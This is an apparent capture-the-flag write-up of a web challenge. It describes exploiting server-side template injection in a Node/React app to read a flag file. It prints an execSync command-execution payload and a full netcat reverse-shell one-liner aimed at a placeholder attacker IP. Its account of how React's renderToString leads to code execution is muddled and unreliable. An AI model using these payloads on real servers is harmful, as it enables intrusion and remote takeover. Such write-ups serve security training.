Category: Web Exploitation
Points: 400
Author: Saurabh Sharma
"The admin loves modern frameworks so much they decided to render user input on the server side using a distinctively vulnerable configuration. Can you pop a shell?"
We are presented with a simple React application. The source code reveals that it is using Server-Side Rendering (SSR).
Specifically, there was an endpoint that took user input and rendered it directly into the HTML template without proper sanitization.
// Vulnerable snippet
app.get('/', (req, res) => {
const { name } = req.query;
const html = renderToString(<App greeting={name} />);
// ...
});
However, digging deeper, we found that the application wasn't just rendering React components, it was using a template engine that evaluated expressions.
We identified that the name parameter was being passed into a context where Node.js code execution was possible.
We crafted a payload to execute system commands.
require('child_process').execSync('cat /flag.txt').toString()
Encoding this payload and sending it via the query parameter allowed us to execute the command on the server.
/?name={{ require('child_process').execSync('cat /flag.txt').toString() }}
To get a full interactive shell, we used a standard reverse shell payload:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR-IP> <PORT> >/tmp/f
Web encoded, this gave us full access to the server.
Flag: HackHaul{R34c7_SSR_RCE_1s_Re4l}